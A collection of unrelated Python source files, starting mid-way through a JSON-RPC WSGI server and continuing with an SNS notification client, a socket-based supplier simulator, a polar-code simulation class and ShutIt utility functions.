response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'RRoller'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_RRoller.rick_roll,
name='RRoller.rick_roll',
types=[basestring])
self.method_authentication['RRoller.rick_roll'] = 'required' # noqa
self.rpc_service.add(impl_RRoller.status,
name='RRoller.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'RRoller ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
in the main thread. Excecution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
sns_client.py
|
import httplib
import json
import sys
from Queue import Queue
from threading import Thread
class SNSClient(object):
def __init__(self, api_url, api_key):
if api_url is None:
self.enabled = False
else:
self.enabled = True
self.api_url = api_url
self.api_key = api_key
url = self.api_url
index = self.api_url.find('://')
if index > 0:
url = self.api_url[index+3:]
index = url.find('/')
if index > 0:
self.base_url = url[0:index]
else:
self.base_url = url
self.queue_thread_count = 10
self.queue = Queue(self.queue_thread_count)
for i in range(self.queue_thread_count):
worker = Thread(target=self.do_http_post_from_queue)
worker.setDaemon(True)
worker.start()
def post_start_message(self, state):
self.post_message('start', state, '{} started a new conversation.'.format(state.user_id))
def post_favorites_message(self, state):
self.post_message('favorites', state, '{} requested their favorite recipes.'.format(state.user_id))
def post_ingredient_message(self, state, ingredient_str):
self.post_message('ingredient', state, '{} requested recipes for ingredient \'{}\'.'.format(state.user_id, ingredient_str))
def post_cuisine_message(self, state, cuisine_str):
self.post_message('ingredient', state, '{} requested recipes for cuisine \'{}\'.'.format(state.user_id, cuisine_str))
def post_recipe_message(self, state, recipe_id, recipe_title):
self.post_message('ingredient', state, '{} selected recipe \'{}\'.'.format(state.user_id, recipe_title), recipe_id)
def post_message(self, action, state, message, recipe_id=None):
# if sns not enabled then return
if not self.enabled:
return
ingredient = None
cuisine = None
if state.ingredient_cuisine is not None:
if state.ingredient_cuisine.label == 'ingredient':
ingredient = state.ingredient_cuisine.get_property_value('name')
else:
cuisine = state.ingredient_cuisine.get_property_value('name')
body = json.dumps({
'userQuery': {
'type': 'action'
},
'notification': {
'action': action,
'message': message,
'state': {
'user': state.user_id,
'ingredient': ingredient,
'cuisine': cuisine,
'recipe': recipe_id
}
}
})
self.queue.put(body)
def do_http_post_from_queue(self):
while True:
try:
body = self.queue.get()
self.do_http_post('/notification', body)
except Exception:
print(sys.exc_info())
self.queue.task_done()
def do_http_post(self, path, body=''):
return self.do_http_post_url('/{}{}'.format(self.api_key, path), body)
def do_http_post_url(self, url, body=''):
conn = httplib.HTTPConnection(self.base_url)
conn.request('POST', url, body, headers={
'Content-Type': 'application/json',
'Accept': 'application/json'
})
response = conn.getresponse()
data = response.read()
conn.close()
return json.loads(data)
|
server.py
|
# code to simulate the supplier
# each supplier sends the fix, ttl and start time to the middle server
import socket
from time import sleep
from threading import Thread
from random import *
from jpype import *
# connect to a java jdk to get the time in nano seconds
# Can't use python functions as java has different seed for starting time
startJVM("C:/Program Files/Eclipse Adoptium/jdk-17.0.1.12-hotspot/bin/server/jvm.dll", "-ea")
javaPackage = JPackage("java.lang")
javaTimer = javaPackage.System.nanoTime
num_servers = 4 # number of suppliers to be created
server_port = 12345
client_port = 1025
middle_port_server=3456
# function to create one server with id = id
def create_server(id):
gap_btw_fixes = 0.3 # time gap between 2 fixes
valid_period = 1.2e9 # time to live for each fix
# Connecting to the socket
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("Server Socket successfully created")
sr.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sr.connect(('127.0.0.1', middle_port_server))
# wait for confirmation
x = sr.recv(1024).decode().lower()
while x != "started":
x = sr.recv(1024).decode().lower()
print(x)
pass
print("connected",id, javaTimer())
# start sending fixes. Read the fixes from the file out.txt and then send
f = open("out.txt", "r")
for _ in range(100000): # CHANGE NUMBER OF FIXES HERE
line = f.readline()
if not line:
f = open("out.txt")
line = f.readline()
# sent_msg = Fix: fix;TTL:ttl;Start_Time:start_time###
fix = "Fix:" + str(line) + ";TTL:" + str(int(valid_period)) + ";Start_Time:" + str(javaTimer()) + "###"
sr.send(fix.encode())
sleep(gap_btw_fixes)
# after sending the fixes, send "end" and close the server
print(id, "server closing", javaTimer())
sr.send("end".encode())
sr.close()
# create different threads for each supplier
t = [None]*num_servers
for _ in range(num_servers):
t[_] = Thread(target=create_server, args=(_,))
t[_].start()
# wait for all servers to end
for _ in range(num_servers):
t[_].join()
|
PolarCode.py
|
#!/usr/bin/env python
"""
An object that encapsulates all of the parameters required to define a polar code.
This object must be given to the following classes: `AWGN`, `Construct`, `Decode`, `Encode`, `GUI`, `Shorten`.
"""
import numpy as np
from polarcodes.utils import *
from polarcodes.Construct import Construct
from polarcodes.Shorten import Shorten
from polarcodes.Encode import Encode
from polarcodes.Decode import Decode
from polarcodes.AWGN import AWGN
import json
import matplotlib.pyplot as plt
import threading
import tkinter as tk
class PolarCode:
"""
Attributes
----------
N: int
the mothercode block length
M: int
the block length (after puncturing)
K: int
the code dimension
n: int
number of bits per index
s: int
number of shortened bit-channels
reliabilities: ndarray<int>
reliability vector (least reliable to most reliable)
frozen: ndarray<int>
the frozen bit indices
frozen_lookup: ndarray<int>
lookup table for the frozen bits
x: ndarray<int>
the uncoded message with frozen bits
construction_type: string
the mothercode construction type
message_received: ndarray<int>
the decoded message received from a channel
punct_flag: bool
whether or not the code is punctured
simulated_snr: ndarray<float>
the SNR values simulated
simulated_fer: ndarray<float>
the FER values for the SNR values in ``simulated_snr`` using `simulate`
simulated_ber: ndarray<float>
the BER values for the SNR values in ``simulated_snr`` using `simulate`
punct_type: string
'punct' for puncturing, and 'shorten' for shortening
punct_set: ndarray<int>
the coded punctured indices
punct_set_lookup: ndarray<int>
lookup table for ``punct_set``
source_set: ndarray<int>
the uncoded punctured indices
source_set_lookup: ndarray<int>
lookup table for ``source_set``
punct_algorithm: string
the name of a puncturing algorithm. Options: {'brs', 'wls', 'bgl', 'perm'}
update_frozen_flag: bool
whether or not to update the frozen indices after puncturing
recip_flag: bool
True if ``punct_set`` equals ``source_set``
"""
def __init__(self, M, K, punct_params=('', '', [], [], None,)):
"""
Parameters
----------
M: int
the block length (after puncturing)
K: int
the code dimension
punct_params: tuple
a tuple to completely specify the puncturing parameters (if required).
The syntax is (``punct_type``, ``punct_algorithm``, ``punct_set``, ``source_set``, ``update_frozen_flag``)
"""
self.initialise_code(M, K, punct_params)
self.status_bar = None # set by the GUI so that the simulation progress can be tracked
self.gui_widgets = []
def initialise_code(self, M, K, punct_params):
"""
Initialise the code with a set of parameters the same way as the constructor.
Call this any time you want to change the code rate.
"""
# mothercode parameters
self.M = M
self.N = int(2**(np.ceil(np.log2(M))))
self.n = int(np.log2(self.N))
self.F = arikan_gen(self.n)
self.K = K
self.s = self.N - self.M
self.reliabilities = np.array([])
self.frozen = np.array([])
self.frozen_lookup = np.array([])
self.x = np.zeros(self.N, dtype=int)
self.u = np.zeros(self.N, dtype=int)
self.construction_type = 'bb'
self.message_received = np.array([])
self.punct_flag = False if self.M == self.N else True
self.simulated_snr = np.array([])
self.simulated_fer = np.array([])
self.simulated_ber = np.array([])
self.FERestimate = 0
self.T = None
# puncturing parameters
self.punct_type = punct_params[0]
self.punct_set = np.array(punct_params[2])
self.punct_set_lookup = self.get_lut(punct_params[2])
self.source_set = np.array(punct_params[3])
self.source_set_lookup = self.get_lut(punct_params[3])
self.punct_algorithm = punct_params[1]
self.update_frozen_flag = punct_params[4]
self.recip_flag = np.array_equal(np.array(punct_params[2]), np.array(punct_params[3]))
def __str__(self):
"""
A string definition of PolarCode. This allows you to print any PolarCode object and see all of its
relevant parameters.
Returns
----------
string
a stringified version of PolarCode
"""
output = '=' * 10 + " Polar Code " + '=' * 10 + '\n'
output += "N: " + str(self.N) + '\n'
output += "M: " + str(self.M) + '\n'
output += "K: "+ str(self.K) + '\n'
output += "Mothercode Construction: " + self.construction_type + '\n'
output += "Ordered Bits (least reliable to most reliable): " + str(self.reliabilities) + '\n'
output += "Frozen Bits: " + str(self.frozen) + '\n'
output += "Puncturing Flag: " + str(self.punct_flag) + '\n'
output += "Puncturing Parameters: {punct_type: " + str(self.punct_type) + '\n'
output += " punct_algorithm: " + str(self.punct_algorithm) + '\n'
output += " punct_set: " + str(self.punct_set) + '\n'
output += " source_set: " + str(self.source_set) + '\n'
output += " update_frozen_flag: " + str(self.update_frozen_flag) + "}" + '\n'
return output
def set_message(self, m):
"""
Set the message vector to the non-frozen bits in ``x``. The frozen bits in ``frozen`` are set to zero.
Parameters
----------
m: ndarray<int>
the message vector
"""
self.message = m
self.x[self.frozen_lookup == 1] = m
self.u = self.x.copy()
def get_codeword(self):
"""
Get the codeword that was last encoded in this `PolarCode` object. Note that this codeword is not always
the same as `myPC.u`, since punctured bits are simply set to zero in this variable as if they were
frozen bits, and then decoded using the corresponding puncturing table likelihoods.
Returns
-------
ndarray<float>
the codeword for the last encoded message using `myPC.u`, or None.
"""
if self.punct_flag == False:
return self.u
else:
return self.u[np.where(self.source_set_lookup == 1)]
def get_normalised_SNR(self, design_SNR):
"""
Normalise E_b/N_o so that the message bits have the same energy for any code rate.
Parameters
----------
design_SNR: float
E_b/N_o in decibels
Returns
----------
float
normalised E_b/N_o in linear units
"""
Eb_No_dB = design_SNR
Eb_No = 10 ** (Eb_No_dB / 10) # convert dB scale to linear
Eb_No = Eb_No * (self.K / self.M) # normalised message signal energy by R=K/M (M=N if not punctured)
return Eb_No
def get_lut(self, my_set):
"""
Convert a set into a lookup table.
Parameters
----------
my_set: ndarray<int>
a vector of indices
Returns
----------
ndarray<int>
a LUT with "0" for an index in ``my_set``, else "1"
"""
my_lut = np.ones(self.N, dtype=int)
my_lut[my_set] = 0
return my_lut
def save_as_json(self, sim_filename):
"""
Save all the important parameters in this object as a JSON file.
Parameters
----------
sim_filename: string
directory and filename to save JSON file to (excluding extension)
"""
data = {
'N': self.M,
'n': self.n,
'K': self.K,
'frozen': self.frozen.tolist(),
'construction_type': self.construction_type,
'punct_flag': self.punct_flag,
'punct_type': self.punct_type,
'punct_set': self.punct_set.tolist(),
'source_set': self.source_set.tolist(),
'punct_algorithm': self.punct_algorithm,
'update_frozen_flag': self.update_frozen_flag,
'BER': self.simulated_ber.tolist(),
'FER': self.simulated_fer.tolist(),
'SNR': self.simulated_snr.tolist()
}
with open(sim_filename + '.json', 'w', encoding='utf-8') as f:
json.dump(data, f, ensure_ascii=False, indent=4)
def run_simulation(self, Eb_No, max_iter, min_errors, min_iters):
frame_error_count = 0
bit_error_count = 0
num_blocks = 0
for i in range(1, max_iter + 1):
# simulate random PC in an AWGN channel
self.set_message(np.random.randint(2, size=self.K))
Encode(self)
AWGN(self, Eb_No)
Decode(self)
# detect errors
error_vec = self.message ^ self.message_received
num_errors = sum(error_vec)
frame_error_count = frame_error_count + (num_errors > 1)
bit_error_count = bit_error_count + num_errors
# early stopping condition
num_blocks = i
if frame_error_count >= min_errors and i >= min_iters:
break
return frame_error_count, bit_error_count, num_blocks
def simulate(self, save_to, Eb_No_vec, design_SNR=None, max_iter=100000, min_iterations=1000, min_errors=30, sim_seed=1729, manual_const_flag=True):
"""
Monte-carlo simulation of the performance of this polar code.
The simulation has an early stopping condition of when the number of errors is below min_errors.
Each E_b/N_o simulation has an additional early stopping condition using the minimum iterations
and the minimum number of errors. The results are saved in a JSON file using :func:`save_as_json`.
Parameters
----------
save_to: string
directory and filename to save JSON file to (excluding extension)
Eb_No_vec: ndarray<float>
the range of SNR values to simulate
design_SNR: float
the construction design SNR, E_b/N_o
max_iter: int
maximum number of iterations per SNR
min_iterations: int
the minimum number of iterations before early stopping is allowed per SNR
min_errors: int
the minimum number of frame errors before early stopping is allowed per SNR
sim_seed: int
pseudo-random generator seed, default is 1729 ('twister' on MATLAB)
manual_const_flag: bool
a flag that decides if construction should be done before simulating.
Set to False if mothercode and/or puncturing constructions are manually set by the user.
"""
# initialise simulation
np.random.seed(sim_seed)
frame_error_rates = np.zeros(len(Eb_No_vec))
bit_error_rates = np.zeros(len(Eb_No_vec))
# do construction if not done already
if not manual_const_flag:
if self.punct_flag and self.punct_type == 'shorten':
Shorten(self, design_SNR)
else:
Construct(self, design_SNR)
print(self)
print('=' * 10, "Simulation", '=' * 10)
for i in range(len(Eb_No_vec)):
# run simulation for the current SNR
frame_error_count, bit_error_count, num_blocks = self.run_simulation(Eb_No_vec[i], max_iter, min_errors, min_iterations)
# calculate FER and BER
frame_error_rate = frame_error_count / num_blocks
bit_error_rate = bit_error_count / (self.K * num_blocks)
frame_error_rates[i] = frame_error_rate
bit_error_rates[i] = bit_error_rate
print("Eb/No:", round(Eb_No_vec[i], 5), " FER:", round(frame_error_rate, 3), " BER:", round(bit_error_rate, 5))
print('# Iterations:', num_blocks, ' # Frame Errors:', frame_error_count, ' # Bit Errors:', bit_error_count)
print('='*20)
# update GUI (if used)
if self.status_bar != None:
self.status_bar.set("Simulation progress: " + str(i + 1) + "/" + str(len(Eb_No_vec)))
# early stopping condition
if frame_error_count < min_errors:
break
# write data to JSON file
self.simulated_snr = Eb_No_vec
self.simulated_ber = bit_error_rates
self.simulated_fer = frame_error_rates
self.save_as_json(save_to)
# update GUI construction fields (if used)
if self.status_bar != None:
self.gui_widgets[3].delete("1.0", tk.END)
self.gui_widgets[6].delete("1.0", tk.END)
self.gui_widgets[3].insert(tk.INSERT, ",".join(map(str, self.frozen)))
self.gui_widgets[6].insert(tk.INSERT, ",".join(map(str, self.punct_set)))
# update console and GUI
print("Successfully completed simulation.\n")
if self.status_bar != None:
self.status_bar.set("Simulation progress: Done.")
def plot_helper(self, new_plot, sim_filenames, dir, plot_title = 'Polar Code Performance'):
# plot the FER and BER from file list
new_plot.cla()
for sim_filename in sim_filenames:
with open(dir + sim_filename + '.json') as data_file:
data_loaded = json.load(data_file)
new_plot.plot(data_loaded['SNR'], data_loaded['FER'], '-o', markersize=6, linewidth=3, label=sim_filename)
# format the plots
new_plot.set_title(plot_title)
new_plot.set_ylabel("Frame Error Rate")
new_plot.set_xlabel("$E_b/N_o$ (dB)")
new_plot.grid(linestyle='-')
new_plot.set_yscale('log')
new_plot.legend(loc='lower left')
# call this for manual plotting
def plot(self, sim_filenames, dir):
"""
Plot multiple sets of FER data from the same directory on the same axes.
Parameters
----------
sim_filenames: ndarray<string>
a list of all filenames to plot in a common root directory
dir: string
the root directory for the specified filenames
"""
fig = plt.figure()
new_plot = fig.add_subplot(111)
self.plot_helper(new_plot, sim_filenames, dir)
fig.show()
# used by the GUI class for automated plotting
def gui_plot_handler(self, gui_dict, fig):
sim_filenames = gui_dict['filenames']
dir = gui_dict['file_dir']
self.plot_helper(fig, sim_filenames, dir)
# used by the GUI class for simulating a new code
def gui_sim_handler(self, gui_dict):
# updated Polar Code from user
punct_type = 'shorten' if gui_dict['punct_type'] == True else 'punct'
shortening_params = (punct_type, gui_dict['punct_algo'], np.array(gui_dict['shortened_set'], dtype=int),
np.array(gui_dict['shortened_set'], dtype=int), False)
self.initialise_code(gui_dict['N'], gui_dict['K'], shortening_params)
self.construction_type = gui_dict['construction_algo']
self.frozen = gui_dict['frozen_set']
# simulation parameters from user
iterations = gui_dict['iterations']
min_frame_errors = gui_dict['min_frame_errors']
file_dir = gui_dict['file_dir']
save_to = gui_dict['save_to']
manual_const_flag = gui_dict['manual_const_flag']
design_SNR = gui_dict['design_SNR']
Eb_No_vec = gui_dict['snr_values']
# run simulation in another thread to avoid GUI freeze
th = threading.Thread(name='sim_thread', target=self.simulate, args=(save_to, Eb_No_vec, design_SNR, iterations, 1000, min_frame_errors, 1729, manual_const_flag,))
th.setDaemon(True)
th.start()
|
shutit_util.py
|
#!/usr/bin/env pythen
"""ShutIt utility functions.
"""
# The MIT License (MIT)
#
# Copyright (C) 2014 OpenBet Limited
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# ITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import print_function
import binascii
import getpass
import logging
import os
import random
import re
import readline
import signal
import socket
import stat
import string
import sys
import threading
import time
import traceback
import shutit_assets
import shutit_class
import shutit_global
import shutit
if shutit_global.shutit_global_object.ispy3:
from builtins import input
else:
input=raw_input
def is_file_secure(file_name):
"""Returns false if file is considered insecure, true if secure.
If file doesn't exist, it's considered secure!
"""
if not os.path.isfile(file_name):
return True
file_mode = os.stat(file_name).st_mode
if file_mode & (stat.S_IRGRP | stat.S_IWGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH):
return False
return True
def colorise(code, msg):
"""Colorize the given string for a terminal.
See https://misc.flogisoft.com/bash/tip_colors_and_formatting
"""
return '\033[%sm%s\033[0m' % (code, msg) if code else msg
def emblinken(msg):
"""Blink the message for a terminal
"""
return '\033[5m%s\033[0m' % msg
def random_id(size=8, chars=string.ascii_letters + string.digits):
"""Generates a random string of given size from the given chars.
@param size: The size of the random string.
@param chars: Constituent pool of characters to draw random characters from.
@type size: number
@type chars: string
@rtype: string
@return: The string of random characters.
"""
return ''.join(random.choice(chars) for _ in range(size))
def random_word(size=6):
"""Returns a random word in lower case.
"""
words = shutit_assets.get_words().splitlines()
word = ''
while len(word) != size or "'" in word:
word = words[int(random.random() * (len(words) - 1))]
return word.lower()
def get_hash(string_to_hash):
"""Helper function to get preceding integer
eg com.openbet == 1003189494
>>> import binascii
>>> abs(binascii.crc32(b'shutit.tk'))
782914092
Recommended means of determining run order integer part.
"""
return abs(binascii.crc32(string_to_hash.encode()))
# get the ordinal for a given char, in a friendly way
def get_wide_hex(char):
if len(char) != 2:
return r'\x' + hex(ord(char))[2:]
return r'\u' + hex(0x10000 + (ord(char[0]) - 0xD800) * 0x400 + (ord(char[1]) - 0xDC00))[2:]
# CTRL-\ HANDLING CODE STARTS
def ctrl_quit_signal_handler(_,frame):
shutit_global.shutit_global_object.shutit_print(r'CRTL-\ caught, hard-exiting ShutIt')
shutit_frame = get_shutit_frame(frame)
if shutit_frame:
shutit_class.do_finalize()
shutit_global.shutit_global_object.handle_exit(exit_code=1)
# CTRL-\ HANDLING CODE ENDS
# CTRL-C HANDLING CODE STARTS
in_ctrlc = False
def ctrlc_background():
global ctrl_c_calls
global in_ctrlc
ctrl_c_calls += 1
if ctrl_c_calls > 10:
shutit_global.shutit_global_object.handle_exit(exit_code=1)
in_ctrlc = True
time.sleep(1)
in_ctrlc = False
def ctrl_c_signal_handler(_, frame):
"""CTRL-c signal handler - enters a pause point if it can.
"""
global ctrl_c_calls
ctrl_c_calls += 1
if ctrl_c_calls > 10:
shutit_global.shutit_global_object.handle_exit(exit_code=1)
shutit_frame = get_shutit_frame(frame)
if in_ctrlc:
msg = 'CTRL-C hit twice, quitting'
if shutit_frame:
shutit_global.shutit_global_object.shutit_print('\n')
shutit = shutit_frame.f_locals['shutit']
shutit.log(msg,level=logging.CRITICAL)
else:
shutit_global.shutit_global_object.shutit_print(msg)
shutit_global.shutit_global_object.handle_exit(exit_code=1)
if shutit_frame:
shutit = shutit_frame.f_locals['shutit']
if shutit.build['ctrlc_passthrough']:
shutit.self.get_current_shutit_pexpect_session().pexpect_child.sendline(r'')
return
shutit_global.shutit_global_object.shutit_print(colorise(31,"\r" + r"You may need to wait for a command to complete before a pause point is available. Alternatively, CTRL-\ to quit."))
shutit.build['ctrlc_stop'] = True
t = threading.Thread(target=ctrlc_background)
t.daemon = True
t.start()
# Reset the ctrl-c calls
ctrl_c_calls = 0
return
shutit_global.shutit_global_object.shutit_print(colorise(31,'\n' + '*' * 80))
shutit_global.shutit_global_object.shutit_print(colorise(31,"CTRL-c caught, CTRL-c twice to quit."))
shutit_global.shutit_global_object.shutit_print(colorise(31,'*' * 80))
t = threading.Thread(target=ctrlc_background)
t.daemon = True
t.start()
# Reset the ctrl-c calls
ctrl_c_calls = 0
def get_shutit_frame(frame):
global ctrl_c_calls
ctrl_c_calls += 1
if ctrl_c_calls > 10:
shutit_global.shutit_global_object.handle_exit(exit_code=1)
if not frame.f_back:
return None
else:
if 'shutit' in frame.f_locals:
return frame
return get_shutit_frame(frame.f_back)
ctrl_c_calls = 0
# CTRL-C HANDLING CODE ENDS
def print_frame_recurse(frame):
if frame.f_back:
shutit_global.shutit_global_object.shutit_print('=' * 77)
